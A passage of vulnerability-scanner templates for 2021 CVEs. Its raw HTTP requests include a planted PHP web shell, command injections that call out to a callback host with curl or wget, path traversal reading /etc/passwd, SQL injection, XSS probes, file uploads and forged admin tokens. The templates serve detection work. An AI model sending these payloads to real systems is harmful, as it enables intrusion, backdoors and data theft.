000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}\n--43992a07d9a30213782780204a9f032b--\n","POST /./RestAPI/Connection HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmethodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n","GET /help/admin-guide/test.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["114f7ce498a54a1be1de1f1e5731d0ea"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36356","info":{"name":"Kramer VIAware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nradioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n","GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-28151","info":{"name":"Hongdian H8922 3.0.5 - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n","POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","application/x-www-form-urlencoded"],"condition":"or"},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36749","info":{"name":"Apache Druid - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","druid:*:1000:1000:"],"condition":"or"}]}]},{"id":"CVE-2021-32853","info":{"name":"Erxes <0.23.0 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["topic_id: \"</script><script>alert(document.domain)</script>","window.erxesEnv"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24746","info":{"name":"WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts","{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["?a\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"slug","group":1,"regex":["\"slug\":\"([_a-z-A-Z0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-21805","info":{"name":"Advantech R-SeeNet 2.4.12 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ping.php?hostname=|dir"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Ping |dir</title>","bottom.php"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26295","info":{"name":"Apache OFBiz <17.12.06 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n<soapenv:Envelope\n  xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ns1:clearAllEntityCaches xmlns:ns1=\"http://ofbiz.apache.org/service/\">\n          <ns1:cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</ns1:cus-obj>\n      </ns1:clearAllEntityCaches>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["errorMessage"],"condition":"and"},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2021-33544","info":{"name":"Geutebruck - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24956","info":{"name":"Blog2Social < 6.8.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&b2sShowByDate=\"><script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" name=","Your Activity"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35380","info":{"name":"TermTalk Server 3.24.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file?valore=../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-24340","info":{"name":"WordPress Statistics <13.0.8 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"WP Statistics\")"],"condition":"and"},{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 500","contains(body_2, \">WordPress &rsaquo; Error<\") && contains(body_2, \">Your request is not valid.<\")"],"condition":"and"}]}]},{"id":"CVE-2021-31581","info":{"name":"Akkadian Provisioning Manager - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/database/pme/phinx.yml"],"matchers-condition":"and","matchers":[{"type":"word","words":["host:","name:","pass:"],"condition":"and"},{"type":"word","negative":true,"words":["html>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3374","info":{"name":"Rstudio Shiny Server <1.5.16 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2f/","{{BaseURL}}/sample-apps/hello/%2f/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /"]},{"type":"regex","part":"body","regex":["[A-Za-z].*\\.R"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45232","info":{"name":"Apache APISIX Dashboard <2.10.1 - API Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/apisix/admin/migrate/export"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Consumers\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24146","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["mec-events","text/csv"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38704","info":{"name":"ClinicCases 7.3.3 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25281","info":{"name":"SaltStack Salt <3002.5 - Auth Bypass","severity":"critical"},"requests":[{"raw":["POST /run HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["return","tag","jid","salt","wheel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3019","info":{"name":"ffay lanproxy Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../conf/config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"],"condition":"and"},{"type":"word","part":"body","words":["config.admin.username","config.admin.password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24452","info":{"name":"WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-44138","info":{"name":"Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/;/WEB-INF/web.xml","{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","application/xml"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41192","info":{"name":"Redash Setup Configuration - Default Secrets Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs","{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Enter your new password:","redash"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34643","info":{"name":"WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20123","info":{"name":"Draytek VigorConnect 1.6.0-B - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything","{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21087","info":{"name":"Adobe ColdFusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js","{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js","{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46418","info":{"name":"Telesquare TLR-2855KS6 - Arbitrary File Creation","severity":"high"},"requests":[{"raw":["PUT /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{randstr}}\n","GET /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 201","contains(server_1, \"lighttpd\") && contains(content_type_2, \"text/plain\")","contains(body_2, \"{{randstr}}\")"],"condition":"and"}]}]},{"id":"CVE-2021-41291","info":{"name":"ECOA Building Automation System - Directory Traversal Content Disclosure","severity":"high"},"requests":[{"raw":["GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-25063","info":{"name":"WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>' type='hidden"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-4436","info":{"name":"3DPrint Lite < 1.9.1.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353\n\n-----------------------------54331109111293931601238262353\nContent-Disposition: form-data; name=\"action\"\n\np3dlite_handle_upload\n-----------------------------54331109111293931601238262353\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.php\"\nContent-Type: text/php\n\n<?php echo \"{{string}}\";unlink(__FILE__);?>\n-----------------------------54331109111293931601238262353--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jsonrpc\":\"2.0\"","\"filename\":","{{filename}}.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22122","info":{"name":"FortiWeb - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//","{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert('document.domain')","No policy has been chosen."],"condition":"and"}]}]},{"id":"CVE-2021-40438","info":{"name":"Apache <= 2.4.48 Mod_Proxy - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}/"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains_all(header, \"X-Interactsh-Version\", \"Server: oast\")","!contains(body, '<h1> Interactsh Server </h1>')"],"condition":"and"}]}]},{"id":"CVE-2021-26085","info":{"name":"Atlassian Confluence Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<display-name>Confluence</display-name>","com.atlassian.confluence.setup.ConfluenceAppConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41653","info":{"name":"TP-Link - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi?2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\ndataBlockSize=64\ntimeout=1\nnumberOfRepetitions=4\nhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\nX_TP_ConnName=ewan_ipoe_d\ndiagnosticsState=Requested\n","POST /cgi?7 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-44910","info":{"name":"SpringBlade - Information Leakage","severity":"high"},"requests":[{"raw":["GET /api/blade-user/user-list HTTP/1.1\nHost: {{Hostname}}\nBlade-Auth: bearer {{bearer}}\n"],"payloads":{"bearer":["eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk","eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk","eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.kol9scDVwLDE8U3mM_j8O4UYrpdUc9_Zw935g7Nb979DfRuanai1UeKsK2zCKuR77Otryi0sGzBfGANDbLseBg"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"account\":","\"password\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27315","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-40968","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28377","info":{"name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39211","info":{"name":"GLPI 9.2/<9.5.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/telemetry.php","{{BaseURL}}/glpi/ajax/telemetry.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"uuid\":","\"glpi\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24627","info":{"name":"G Auto-Hyperlink <= 1.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+I\n","GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["c8c605999f3d8352d7bb792cf3fdb25b","Keyword","g-auto-hyperlink-edit"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24406","info":{"name":"WordPress wpForo Forum < 1.9.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-46381","info":{"name":"D-Link DAP-1620 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/apply.cgi"],"body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-24791","info":{"name":"Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 20s\nGET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2,\"Add New Snippet\")"],"condition":"and"}]}]},{"id":"CVE-2021-1472","info":{"name":"Cisco Small Business RV Series - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nCookie: sessionid='`wget http://{{interactsh-url}}`'\nAuthorization: QUt6NkpTeTE6dmk4cW8=\nContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"option\"\n\n5NW9Cw1J\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"destination\"\n\nJ0I5k131j2Ku\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file.path\"\n\nEKsmqqg0\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\nContent-Type: application/xml\n\nqJ57CM9\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"filename\"\n\nJbYXJR74n.xml\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\n-----------------------------392306610282184777655655237536--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"jsonrpc\":"]}]}]},{"id":"CVE-2021-24499","info":{"name":"WordPress Workreap - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\nX-Requested-With: XMLHttpRequest\n\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"action\"\n\nworkreap_award_temp_file_uploader\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-httpd-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------cd0dc6bdc00b1cf9--\n","GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\nHost: 